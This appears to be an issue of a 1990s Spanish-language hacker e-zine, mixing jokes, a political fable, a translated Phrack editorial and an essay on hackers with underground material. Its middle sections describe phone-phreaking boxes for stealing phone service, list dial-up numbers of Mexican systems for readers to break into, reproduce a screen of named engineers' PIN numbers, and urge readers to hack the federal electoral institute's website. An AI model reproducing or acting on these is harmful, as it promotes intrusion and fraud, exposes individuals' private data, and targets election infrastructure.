ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Pregunta a McAfee: ¨Es Windows un Virus?
No, Windows no es un virus. Esto es lo que hacen los virus:

Ellos se replican rapidamente.
-- Okay, Windows hace eso.
Los virus toman recursos valuables haciendo mas lento el sistema.
-- Okay, Windows hace eso.
Los virus, de vez en vez, echaran a perder tu disco duro.
-- Okay, Windows hace eso.
Los virus son usualmente contenidos, sin saber el usuario, junto con
programas valiosos y sistemas.
-- Okay, Windows hace eso tambien!
Los virus haran ocasionalmente sospechar a el usuario que su sistema es
demasiado lento y el usuario comprara nuevo hardware.
-- Yup, eso tambien es Windows.


Hasta ahorita parece que Windows es un virus pero hay algunas diferencias
fundamentales: Los virus estan bien apoyados por sus autores, pueden ser
ejecutados en la mayoria de los sistemas, su codigo de programacion es
rapido, compacto y eficiente, ademas tienden a hacerse mas sofisticados
conforme maduran.

Asi que Windows *NO* es un virus.

Es un error. (bug)

Autor: saarm@netvision.net.il
Traduccion: RareGaZz

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]

()()()()()()()()()()()
() Los vendedores ()
() y ()
() el Anacoreta ()
()()()()()()()()()()()

Homero Roa era un ermita¤o que no sabia nada del mundo...

Pero alla en la ciudad, lejos de su caba¤a, vivian dos vendedores, vendedores
de FELICIDAD.-Cada uno representaba una felicidad distinta, por lo tanto,
eran rivales.

La felicidad de uno se llamaba Capitalismo. (Elmer Zig)
Y el otro llamaba a su sistema de felicidad: Comunismo. (Fedor Zag)

Cada uno de ellos sabia que ganar a Homero Roa para su causa seria un gran
triunfo ya que Roa representaba la pureza, la neutralidad y el desinteres...

Y asi el anacoreta comenzo a recibir inesperadas visitas.

"
Nuestro sistema para lograr la felicidad es el mejor."-Dijo Elmer Zig

"
Todo lo que usted tiene que hacer es ser de los nuestros y lo tendra todo."

"
Primero se ba¤a, se rasura, se viste de hombre de negocios y obtiene un
empleo con un salario fijo..."

"
Ahora es usted un caballero y entrara triunfante en el mundo occidental - El
mundo del dinero le dara toda la dicha que anhela..."

"
Usted tiene un empleo, Homero Roa.- Ese empleo le da un salario y una
seguridad.- Con el ahorro, que es otro de nuestros inventos, usted
prosperara."

"
Tiene una hora para almorzar.-Puede correr a la fonda... buscar un
asiento... pedir un 'sandwich'...fumar un cigarrillo...y volver al trabajo."

"
Pero lo mejor del dia viene ahora: a orillas de la ciudad esta el nido de
amor que usted paga en comodos plazos; ahi su bella mujercita le espera...­y
los reto¤os!"

"
La cena esta lista - platillos copiados del 'Lady's Home Journal', ­Que
delicia! - Su dulce suegra, miembro del comite de damas caritativas, esta a
la mesa."

"
No hay nada como la vida familiar en Occidente.-Usted es padre de familia -
Es el jefe.- Pero Apresurese la cena, pues sigue lo mejor del hogar ­LA
TELEVISION!"

"
La television es el mejor substituto del pensamiento. Si usted quiere gozar
de ella, ponga su cerebro en blanco.-­No Piense!"

"
Los programas de t.v. estan hechos para retrasados mentales.- Cierto, pero
no se ofenda.- Usted es uno de ellos solamente cuando ve tales programas."

"
La television piensa por usted; le dice que cigarrillos debe fumar y que
licor debe beber.- Todo lo que toca lo vuelve mediocre, pero evita la
molestia de pensar..."

"
Mi camino a la felicidad -Siguio diciendo Zig- esta lleno de comodidades.-
El 'confort' es nuestra especialidad".

"
Autos que se manejan con botones.- Calefaccion central. Cobertores
electricos... O radios de transistores, muy utiles para anacoretas que viven
en las monta¤as.- Ademas, periodicos con tiras comicas y una seccion a
colores los domingos."

"
Y lo que es mejor: ­Todo esto se lo damos a usted AHORA y lo paga en 20
a¤os."

"
Pero apresurese a aceptar, pues es una oferta limitada; tal vez *NO* alcance
para todos.- El sistema capitalista es bueno para los que lo aprovechan.-
¨Acepta Usted?"

El asceta quedo pensativo...luego dirigio una larga mirada a Elmer Zig y
dijo:

"
­NO!- NO ACEPTO. Primero debo conocer la oferta de la competencia."

Zig quedo atonito.- Zag entro en accion como super vendedor de la parte
contraria. De lejos notaba que Zig y Zag habian leido dos versiones distintas
del "
arte de vender".

Pero -despues de todo- el producto hace al vendedor y el producto de zag era
dicha comunista...Roa escucho...

"
Nuestro sistema produce felicidad para usted y para las generaciones
futuras"- Comenzo diciendo Zag.

"
Si se afilia a nuestra causa tendra toda la dicha que le ofrecemos..."

"
En primer lugar se ba¤a. se rasura, se viste de obrero y obtiene un trabajo
con salario fijo."

"
Ahora es nuestro 'camarada' y entrara triunfante en el mundo socialista.-
Veamos que clase de dicha le ha reservado el partido..."

"
Ya es usted un obrero y tiene un salario.- De su seguridad futura se ocupara
el partido.- Con disciplina, que es uno de nuestros requisitos, sera un
obrero feliz."

"
Tiene una hora para almorzar; corre al refectorio de la fabrica... Busca un
asiento...pide un 'borscht'...fuma un cigarrillo...y vuelve al trabajo."

"
Pero viene lo mejor: a orillas de la ciudad el estado posee una casita
habitada por usted - ahi lo espera su bella esposa y camaraditas."

"
La cena esta lista: platillos aconsejados por el comisariado de alimentos;
­QUE DELICIA! - Su suegra, que es miembro de la policia secreta, esta a la
mesa."

"
No hay nada como la vida familiar en el socialismo.- El estado es jefe de la
casa y lo releva a usted de problemas.- y ahora, una sorpresa: ­LA TELEVISION
SOCIALISTA!"

"
La television comunista tambien sustituye al cerebro, pero en forma mas
definitiva.- Sabemos que el pensar hace infeliz al hombre y aqui lo queremos
feliz a fuerzas."

"
Si la television occidental vende muchos productos, la television nuestra
vende solo uno: COMUNISMO.- Esto parece aburrido, pero no lo es..."

"
Aqui no aconsejamos que cigarrillos fumar, sino que actitud debe tomar ante
la vida.- Y eso es mejor; ahorra esfuerzos..."

"
Nuestro camino a la dicha esta lleno de satisfacciones; luchar por el
Estado, trabajar para el Estado, hacer politica y ser el Estado..."

"
Cambiar de opio a los pueblos, conquistar el espacio, emancipar a las
masas."

"
El comunismo emancipo al proletariado, que antes era mayoria,
conviertiendolo en minoria dirigente, por eso esta es 'La Dictadura del
Proletariado'."

"
De acuerdo con nuestro plan, usted paga AL CONTADO y se olvida de
preocupaciones economicas - Y los beneficios los recibe a plazos...en 20
a¤os.- Con justicia social el comunismo alcanzara en comodidades a occidente
en ese plazo...¨Acepta Usted?"

El hermita¤o penso: "
Y por medio del capitalismo occidente piensa alcanzar al
comunismo en justicia social...tambien en veinte a¤os.".- Hubo un silencio y
luego, dirigiendose a ambos, dijo:

"
Lo siento, NO puedo aceptar ninguna de las dos ofertas."

"
Sus sistemas han sido dise¤ados para el hombre ordinario y creo que los dos
cometen un error: El hombre ordinario NO EXISTE.- Todos somos diferentes."

"
Por ejemplo, yo vivo solitario por que me gusta; no encuentro placer en la
civilizacion que me ofrecen, no me importan ni el ba¤o ni la ropa..."

"
Parezco ser el mas pobre de los pobres, pero no busco un empleo, ni un
salario, ni un jefe...tengo menos que nadie, comunistas y occidentales, pero
tengo mas independencia que ambos..."

"
No quiero pagar por una casita a plazos ni quiero que el Estado la pague por
mi.- Esto parece extra¤o, pues representa el sue¤o de todo Burgues y, en una
u otra forma, los dos sistemas aspiran a la Burguesia..."

"
Pero mi ejemplo solo prueba que TODOS los hombres somos diferentes."

"
Y para finalizar, les dire que la felicidad que me ofrecen yo ya la
consegui -; Por ella no pague nada, ni al contado ni a plazos.- Solamente
QUISE ser feliz...y lo SOY."

Aqui termina esta historia, aunque hay quien dice que ahora, en lo alto de
las monta¤as, no hay un anacoreta, sino tres: HOMERO ROA, ELMER ZIG Y FEDOR
ZAG.

[ Este texto muestra una parte del espiritu de RareGaZz ]
[ Educar - Fomentar el razonamiento - Crear ]

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]

****************************
* phreaking *
* tutorial *
***********************

¨Que es Phreaking?
------------------

Phreaking es cuando le robas dinero a la compa¤ia telefonica para hacer
llamadas de larga distancia o locales gratis. Esto puede ser hecho de
distintas maneras. Phreaking es 100% ilegal pero eso nunca nos ha detenido.

Como haces phreak?
------------------

Existen 3 formas de joder a las compa¤ias telefonicas:

1. Cajas de colores (azul, purpura, etc.)
2. Usando at&t, mci, etc. sin pagar.
3. "
Trucos del negocio"

Cajas de colores
----------------

Un boton de pulso trabaja por que emite tonos de distintas frecuencias.
Cambiando las frecuencias puedes hacer cosas interesantes. Los phreaks que
han estado haciendo esto tienen aparatos llamados 'cajas'. Aqui hay una
descripcion breve de algunas...

Tipo de Caja
------------

color funcion
~~~~~ ~~~~~~~
azul Todas las llamadas por el precio de una local.
purpura Todas las llamadas gratis!
plateada Llamadas gratis,etc. La armada de EUA las usa.
Caja de sonidos Hace los sonidos de cuando las monedas caen al telefono.
Caja que queso Hace las llamadas imposibles de localizar.

[ Texto enviado a nosotros por alguien que lo tradujo Ingles - Espa¤ol ]

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]


==Phrack Magazine==

Volume Seven, Issue Forty-Eight, File 2 of 18

Phrack Editorial

----------------------------------------------------------
Exclusiva de RareGaZz
----------------------------------------------------------

Esta probablemente sea mi ultima editorial aqui en Phrack asi que como ya
no estare en el rol de editor, se me ocurrio que terminare con mi crusada
de hacer enojar al mundo entero.

No me gusta ninguno de ustedes gente. La subcultura del hacking se ha
convertido en un chiste de lo que fue. La gente puede argumentar que la
comunidad ha "
evolucionado" o "crecido" de alguna manera, pero eso es
pura basura. La comunidad ha degenerado. Se ha convertido en una fuerza
alimentada por los medios de comunicacion. El acto de desafio intelectual
que representaba el hacking ha sido reemplazado por codicia, ganas de
reconocimiento y mal-acomodado por post-adolescentes.

DefCon IV epitomizo este cambio con un sorprendente detalle, que solo puedo
tener esperanzas de ponerlo en palabras correctamente. Imagina el bastardo
offspring de Lollapalooza y una convencion Star Trek. Imagina 300+ gentes
fuera de sus casas, lejos del ojo guardian de sus madres por primera vez
en sus pateticas vidas. Imagina esa misma gente con el ego de Rush Limbaugh
y las habilidades sociales de Jeffrey Dahmer, equipados con laptops con
programas que ellos no pueden usar, y hablando con reporteros de tecnicas que
ellos mismos no entienden. Bienvenido a DefCon.

Si yo tuviera que juzgar a la comunidad de hackers por los resultados de
esta conferencia, mi prognosys seria "
Terminantemente enferma".

Pareceria que "
hacking" sea convertido en el siguiente paso logico para mucha
gente buscando algo con que vengarze de "
algo". "Bien, gee, Ya me he
agujerado todas las partes de mi cuerpo y pintado el pelo color azul...¨que
mas podria hacer para impactar a mis padres? ­Ya Se! Voy a meterme a algun
sistema federal y quizas ponga mi nombre en el periodico ­THAT WOULD BE COOL!
­Sera como la pelicula!"

Odio tronar la burbuja de todos, pero estan jodidos.

En estos dias, realmente no tienes que hacer nada ilegal para ser un hacker.
Esta al alcance de cualquiera aprender mas, y usar computadoras mas poderosas
legalmente que nosotros en los 70's y 80's algun dia so¤amos. En esos
tiempos, era TODO sobre entender como usar estas cosas locas llamadas
computadoras. Habian cientos de diferentes tipos de sistemas, cientos de
diferentes redes, y todos empezaban desde cero. No habia ningun medio publico
de acceso a la informacion; no habia libros en tiendas o gabinetes de
librerias con arcanos comandos y sintaxes; no habia clases para las personas
civiles. Estabamos fuera.

Afrontados con estos obstaculos, jovenes normales, inteligentes, avidos de
conocimiento intentaron ganar acceso a estas fascinantes maquinas a traves
de cualquier medio posible. Simplemente no habia otra forma. No habia leyes,
y a pesar de eso todos sabiamos que tenia algo grotesco. Este hecho a¤adio
un simple 'rush' al break-in (ataque), pero el objetivo principal era
simplemente aprender.

Ahora, con la mayoria de los sistemas operativos basados en UNIX, y la
mayoria de las redes siendo basadas TCP/IP la cantidad de conocimientos
necesaria para un hacker ha disminuido notablemente. Con los increiblemente
bajos precios de las computadoras caseras, y la libre disposicion de
complejos sistemas, la necesidad de break-in en sistemas remotos en orden
de aprender ha sido removida. Ahora los unicos incentivos podrian ser vender
la informacion robada, el rush sicologico que se experimente al tener el
control de un sistema y salirse con la suya. Buscar metas mas altas en el
caso de entrar a sistemas, ahora solo nos lleva a la carcel.

No hay nada absolutamente cool en ir a la carcel. Conozco a demasiada gente
que esta en la carcel, que han estado en la carcel, y algunos que estan a
punto de terminar en ella. Confien en mi cuando digo esto gente. No seras
respetado por nadie si actuas por las simples emociones y terminas en
la carcel. De hecho todos tus "
amigos" pensaran que eres un tonto por ser
tan descuidado...hasta que ellos tambien sean capturados.

Te detienen y seguramente pasaras algun tiempo en la carcel. A pesar de que
te liberen, perderas tu pasaporte y tu habilidad de viajar libremente,
perderas la habilidad de hacer negocios en ambientes clasificados, no podras
ser empleado por la mayoria de las compa¤ias y hasta perderas tus derechos
de usar computadoras o equipo de red por a¤os. ¨Aun vale la pena?

La recompensa ha disminuido y los riesgos han aumentado.

Hacking no es acerca de cometer un crimen. No necesitas ser criminal para
ser un hacker. Andar con hackers no te hara un hacker asi como andar con
doctores en un hospital te hace doctor. Usar camisetas de hackers no
significa que aumentaras tu inteligencia o posicion social. Ser cool no
significa tratar a todos como mierda, o pretender que sabes mas que los
demas.

Desde luego, Yo soy un amargo viviendo en el pasado, asi que,
¨Que puedo Yo saber?

Erik Bloodaxe
~~~~~~~~~~~~~

[ Entre musicos, poetas, locos y hackers te veas ... ]

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]

ÛÛ ÜÛÛÛÛÛÛ ÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛ ÛÛ ÛÛ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÛÛ ÜÛÛ
ÛÛ ÛÛÜÜÜÜ ÞÛÝ ÜÛÛß ÛÛÜÜÜÛÛ ÛÛÜÜÜÛÛ ÛÛ ÛÛÜÛÛß
ÛÛ ÛÛßßßß ÞÛÝ ÜÛÛß ÛÛßßßÛÛ ÛÛßßßÛÛ ÛÛ ÛÛßÛÛÜ
ÛÛÛÛÛÛÛ ßÛÛÛÛÛÛ ÞÛÝ ÛÛÛÛÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ßÛÛÛÛÛß ÛÛ ßÛÛ

ð Suplemento Vitaminico ð
por
-= RdK =-

Antes de empezar con el texto que nos enviaron para este numero quisiera
decirles que el programa creado para encadenar remailers y encriptar los
mensajes usando PGP (o sin el) ya esta disponible en la seccion de WareZ de
nuestra pagina o sigue el siguiente link.
http://www.geocities.com/Baja/4426/REMAIL.ZIP
Esta completamente en Espa¤ol y viene con instrucciones de uso e instalacion.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Numeros de Telefono Para Hackear

Ciberneticos y descarriados amigos les tenemos algunos numeros de telefono
localizados en 91-800 (gratuita la llamada :-) para que intenten sus dones
de hackers y empiecen ­YA! a hackear sistemas mexicanos.

-=Sistema Mexicano SKYTEL=-
~~~~~~~~~~~~~~~~~~~~~~~
9180025451

Baud Parity Data-Bits Stop-Bits
2400 None 8 1

Username: ?????????
Password: ?????????

Cuando te conectes a este sistema aparecera CONNECT en tu programa de
comunicaciones pero no habra respuesta del sistema. Tienes que enviar algunos
breaks y presionar varias teclas hasta que en tu pantalla se muestre el
siguiente texto que (segun yo) incluye la clave del login y password. Nota
que cuando pasa sobre un nombre tu PC hara un pitido -en teoria-

------------------------------Comienza Output---------------------------------
SE LES RECUERDA AL PERSONAL QUE TENEMOS SERVICIO DE SKYTEL
PARA EMERGENCIAS, PARA REQUERIR DICHO SERVICIO.
MARCAR 91(800)72-345 LADA SIN COSTO
O
7642 MARCACION ABREVIADA
CONTESTARA UNA OPERADORA QUE TRABAJA LOS 365 DIAS DE A#O Y
SOLICITARA UN # DE PIN LOS CUALES MOSTRAMOS A CONTINUACION:

# PIN 548-86-52 ING. DANIEL HERNANDEZ M.
# PIN 539-89-40 SR. AGUSTIN AREY C.
# PIN 539-89-41 ING. JORGE CHAVEZ C.
# PIN 539-89-42 ING. JUAN MANUEL CORTES M.
# PIN 539-89-43 ING. ABEL AQUINO V.
# PIN 527-41-53 ING. DANIEL FRIAS R.
# PIN 527-41-54 ING. RAUL HERNANDEZ L.
# PIN 527-41-55 SR. ENRIQUE MARTINEZ RAMOS.
# PIN 548-53-58 ING. JOSE LUIS GONZALEZ
# PIN 548-92-98 ING. JESUS FERNANDEZ R.
# PIN 548-92-99 ING. JOSE LUIS HERNANDEZ M.
# PIN 553-32-16 ING. JOSE ANTONIO PITOL Z.
# PIN 553-32-17 ING. BRAULIO ALVAREZ H.
Username:
-------------------------------Fin del Output---------------------------------

-=Telefonos del Noroeste=-
~~~~~~~~~~~~~~~~~~~~~~
337700 - Tijuana
763301 - Ensenada
?????? - Rosarito
?????? - Mexicali

-=Cetys Ensenada=-
~~~~~~~~~~~~~~~~~~
745300 - Ensenada
745301 - Ensenada
745167 - Ensenada

-=Microsoluciones=-
786031 - Ensenada

­­­­ SE SOLICITAN NUMEROS TELEFONICOS (CARRIERS) PARA ENTRAR A SISTEMAS !!!!
MANDANOS EL NUMERO DE TU UNIVERSIDAD, PROOVEDOR DE SERVICIO, ESCUELA, ETC
Y EL SCRIPT PARA REALIZAR LA CONEXION (login.cmd)

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

ÂÂ Â Â ÚÂÄÄ¿ ÂÂÄÄ¿ ÂÂÄÄ¿ ÄÄÄÄ¿ ÂÂÄÄ¿ ÚÄÂÂÄ¿ ÂÂÄÄ¿
³³ ³ ³ ³ÃÄÄ´ ³ÃÄÂÙ ³ÃÄ ÚÂÄÄÙ ³ÃÄ ³³ ³ÃÄÄÙ
ÀÁÄÁÄÙ ÁÁ Á ÁÁ ÁÄ ÁÁÄÄÙ ÀÁÄÄÄ ÁÁ ÁÁ ÁÁ
ftp.cincos.net
Directorio: /incoming

Lastima, el operador de este servidor se puso una encabronada por todo el
WareZ que se estaba intercambiando en su sistema que decidio borrar *TODOS*
los programas que estan en su directorio incoming. Ni modo.
Los que aprovecharon consiguieron el PcCillin95, Viruscan95, PgpFone, entre
otros programas groovys.

Si descubren otro servidor donde se intercambie WareZ no dejen de avisarnos!

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]

________________
CTRL + ALT + DEL
~~~~~~~~~~~~~~~~
"
Tu linea de comunicacion con el Underground"

En esta seccion se incluyen anuncios, sugerencias, preguntas y todo aquello
que sale sobrando en alguna de las otras secciones.

..............................................................................

­IMPORTANTE!

CrackSmoker, lider temporal de RdK ha dado la orden a todos los miembros de
RdK de intentar hackear el siguiente sistema: http://www.ife.org.mx para que
el grupo gane popularidad y nos hagamos conocidos (mas) en toda la republica.
Actualmente hay aprox. 50 integrantes de este grupo -la mayoria estudiantes
de ciencias computacionales o algo relacionado con Pc's y redes- y todos
trataran de hackear este sistema por lo que sera algo que probablemente SI
logren.
RareGaZz estara atento a modificaciones a ese sistema y les deseamos ­SUERTE!
a todo el grupo para que logren hacer lo que se proponen. Que gane el mejor.
RareTrip, KillerBot, Mr.X y LePompeItor trataran de no dejar abajo a los
lectores de RareGaZz y haran todo lo posible para ser ellos los que entren
y modifiquen ese sistema...imaginen nuestra grafica principal en ese sistema?

CrackSmoker
-=RdK=-
"
Preparados para la Guerra y el Terrorismo"

RareTrip
-=RareDudeZ=-
"
Give us a system, we would give you the password"

[ Para todos los despistados, www.ife.org.mx es la pagina del Instituto
Federal Electoral donde se piensan poner los resultados de las elecciones.
Nota aparte: Los lectores de esta revista tambien estan invitados a este
gran concurso. El ganador recibira popularidad hasta por los FIU! en todo
nuestro grupo y (probablemente) el mundo entero. raretrip ]
..............................................................................

Anuncia tu BBS en ­RareGaZz!
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Tienes una BBS y deseas ver el numero telefonico anotado en algun byte de
esta revista? Pues envianoslo inmediatamente por que en algun proximo numero
pondremos a la disposicion de todos la lista de BBS existentes en toda la
republica mexicana! Si conoces el numero de alguna BBS mandalo para la
publicacion de este articulo.

Si tienes una BBS o pagina personal que tenga los numeros mas actuales de
RareGaZz escribenos para incluir el numero/URL en todos los numeros de esta
revista como 'sitio alternativo para conseguir raregazz' en caso de que
Geocities este muy saturado.
..............................................................................

-=PIRATEAR RAREGAZZ=-

En la revista "
Internet World" numero 4 a¤o 3 aparece el articulo "9 consejos
para proteger su privacia" muy parecido al articulo que aparecio en RareGaZz
tiempo despues con el titulo "
Como permanecer Underground" por Killerbot.
¨Les copiamos? ­NO, Ellos nos piratearon el articulo! Lo hicieron a traves
de un editor de otro magazine conocido al cual le enviamos el articulo con
el titulo "
Privacidad en Internet" para que lo publicara e incluyera nuestra
direccion de correo para promocionar la revista. Tiempo despues se nos aviso
que no iba a ser publicado lo cual aceptamos y enviamos nuestros sinceros
saludos. Pero...­Sorpresa! Aparece el articulo en otra revista *SIN* la
direccion de RareGaZz y ademas mencionando como autor a otra persona.
Ni modo :-(

Pues bien, hace poco nos escribe un atento se¤or de Aguascalientes pidiendo
permiso para publicar algunos articulos de RareGaZz en el periodico local El
Heraldo. El permiso le fue dado y ademas ha sido alentado a hacerlo lo mas
seguido posible siempre y cuando incluya una liga a nuestra pagina y/o la
direccion de correo electronico de RareGaZz para promover nuestra pagina
aun mucho mas.

Moraleja: RareGaZz *SI* puede ser pirateado para revistas, periodicos,
trabajos de la escuela, etc. siempre y cuando incluyan -POR LO MENOS- la
direccion de correo de la revista y seria PREFERIBLE incluir la liga correcta
a nuestra pagina.

Si alguno de

  
ustedes sabe de un periodico o revista que haya publicado un
articulo nuestro sin mencionar a RareGaZz por favor avisen a la editorial
(raregazz@bigfoot.com) y el reporte sera pasado inmediatamente a nuestro
'equipo elite de contra-ataque' para que tomen las medidas necesarias en
contra de esa publicacion.

..............................................................................

-= Concurso de RareGaZz =-

El concurso de RareGaZz para ver quien crea la mejor intro o el mejor logo
de nuestra revista en arte ASCII/ANSI continua y esperamos la participacion
de todos los artistas de ascii/ansi/programacion que esten interesados en
un monton de premios que pensamos enviarle al ganador.

A la lista de premios se incluyen los siguientes:

- Quicktime (version mas nueva) y Quicktime VR para tu navegador.
- Netscape Communicator 4.x
- Un atractivo broche de Viva Zapata cortesia de KB.
- Un libro nuevecito de el maestro Rius.

Todo el software, la camiseta, los diskettes y el cargo por paqueteria suman
mas o menos el gran total de $250 pesos en premios (y no en bonos del ahorro
nacional) para el afortunado ganador. El minimo de participantes para que
el concurso se lleve a cabo son 20. Las bases las puedes encontrar en
RareGaZz #3 junto con una lista de los otros premios.

..............................................................................


¨ Los links de su pagina los copiaron de la revista LINK ?

Algunos -la mayoria- SI. Los links de esa revista nos evitan la molestia de
andar poniendo bookmarks a cada sitio que veamos y a ustedes les ahorra una
feria :-) asi que ¨ Que hay de Malo ?

Obviamente algunos links no los hemos copiado como la liga al sitio de McAfee
donde puedes obtener los updates mas nuevos, la liga a los updates de f-prot,
entre muchas otras ligas a paginas de hackers, etc.
Muchas disculpas si esto le molesta a la editorial de esa revista, para
compensarla ahi les va la siguiente SUPER LIGA de este mes (aja..)

http://www.link.com.mx
(¨contentos?)
..............................................................................

¨ Podemos anunciar productos, servicios, paginas, etc. en RareGaZz ?

­ SI ! Desde luego tendrian que mocharse con una feria por cada vez que
quisieran publicar sus servicios en nuestra revista. Algunos de nuestros
lectores nos piden sugerencias de cual es el mejor proovedor de servicio de
Internet, la tienda virtual con los mejores precios, etc. Asi que si se
anuncian en esta revista de circulacion Nacional/Mundial y dejan una
direccion donde los interesados puedan comunicarse con ustedes seguramente
les ayudaria mucho a ellos (sin mencionar que ustedes conseguirian clientes).

Obviamente no pensamos inundar la revista con anuncios pero uno o dos cada
numero no creo da¤en a nadie y ademas seria la unica forma en que nosotros
podemos ganar dinero de esta revista :-)

¨Interesados? Comuniquense a nuestras direcciones y les diremos como hacer el
pago y la cantidad que tendrian que aportar. Si ustedes los lectores tienen
algo que decir respecto a esto esperamos sus opiniones. De cualquier forma,
espero comprendan.

..............................................................................

¨ Me podrian decir que significa H/P/A/V ?

Muchas paginas de hackers tienen esa palabra en sus descripciones y simboliza

H acking
P hreaking
A narchy
V irii

Servido joven...
..............................................................................

¨ Que buenos libros acerca de Internet me recomiendan leer ?

­ TODA LA SERIE ARCO-IRIS ! En algunas partes de Internet encontraras los
"rainbow books" que son gratuitos e incluyen todo tipo de informacion sobre
redes e informatica. Desafortunadamente estos libros estan en Ingles y son
un poco dificiles de conseguir.
Los libros de la rainbow series fueron escritos por la National Computer
Security Center (NCSC) para ayudar a los administradores de sistemas y
profesionales a crear sistemas seguros que puedan ser confiados.
Algunos que *yo* en lo particular he leido son los siguientes:

Dark Lavender= Explica los metodos de distribucion de software para controlar
la calidad y evitar que sus contenidos sean modificados.

Brown= Esta es la guia para crear un sistema "de confianza" o seguro.

N_Orange= Es la guia para comprender el control discrecional del acceso a
sistemas seguros.

Orange1= Criterios para la evaluacion de un sistema seguro.

Orange2= Es un manual para comprender el control de la configuracion de los
sistemas seguros.

Purpura= La guia para la verificacion formal de los sistemas.

Rojo= Criterios para la evaluacion de una red segura y sus componentes.


Este mes en nuestra pagina podras obtener el libro Brown en nuestra seccion
de WareZ. El mes proximo pondremos otro libro y asi los estaremos rotando
para ahorrar espacio en la cuenta de Geocities. Tu puedes coleccionar ( y
desde luego, leer ) estos libros para aumentar tu conocimiento en forma MUY
considerable -ingles necesario-.

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]

Sobre Hackers, Crackers, Elites y LamerZ
Por: RareTrip

Esto es algo que me siento obligado a decir por la rapida aparicion de
supuestos hackers en la red. Ponganse atentos o no lo lean...

¨Ser hacker que es? ¨Es acaso memorizar firmas de algun hacker conocido como
'todos contra el capitalismo' o 'abajo el gran hermano'? ¨Es un hacker el que
se niega a compartir informacion? ¨Es un hacker el anti-social escondido en
el refugio de su habitacion? Lo siento, pero ese seria mejor catalogado como
un Lamer.

No quiero decir que una persona que no se sienta confortable con las masas o
grandes cantidades de gente sea un lamer (Oh No), al contrario, estas
personas han descubierto que lo importante no es andar en la bola sino
disfrutar el silencio (depeche mode:-). Tampoco es un lamer aquel que sienta
el impulso de crear y el rush de pensar cuando este solo en su habitacion,
no me entiendan mal por favor, un lamer es quien esta solo por que no le
queda de otra. Una persona sola por conviccion es, para mi, alguien super
respetable. Alguien que logro separarse de la sociedad para empezar con
algun acto creativo y nuevo es un hacker, un verdadero hacker.

Un hacker no quiere ser reconocido en la calle como hacker o anti-social, un
hacker quiere -en lo posible- pasar desapercibido para que nadie moleste sus
pensamientos. Un hacker con pelo azul y aretes en la nariz no es otra cosa
que alguien que necesita ayuda, y pronto.

Un lamer es aquel aspirante a hacker que quiere ser hacker sin esforzarse en
absoluto. Un lamer no aspira a tener filosofia propia y se conforma con
chupar toda una forma de pensar y actuar de algun super-hacker al que admire.
Un lamer si no tuviera computadora se conformaria con ver television todo el
dia para despues, aspirar a ser un Batman, Superman o cualquier otro caracter
ficticio pensando que solo necesita la capa para volar.

¨Sabes quien es RareTrip? Para aquellos que me confundan con un se¤or de 40
a¤os o un ni¤o de 15 dejenme decirles que raretrip -al contrario de la
persona que lo ha creado- no tiene edad, no tiene sexo, y tampoco tiene
nacionalidad; es tan solo un IDEAL de alguna persona que trata de proyectarlo
bajo un pseudonimo para hacer un sketch de alguien que quisiera ser. Yo, la
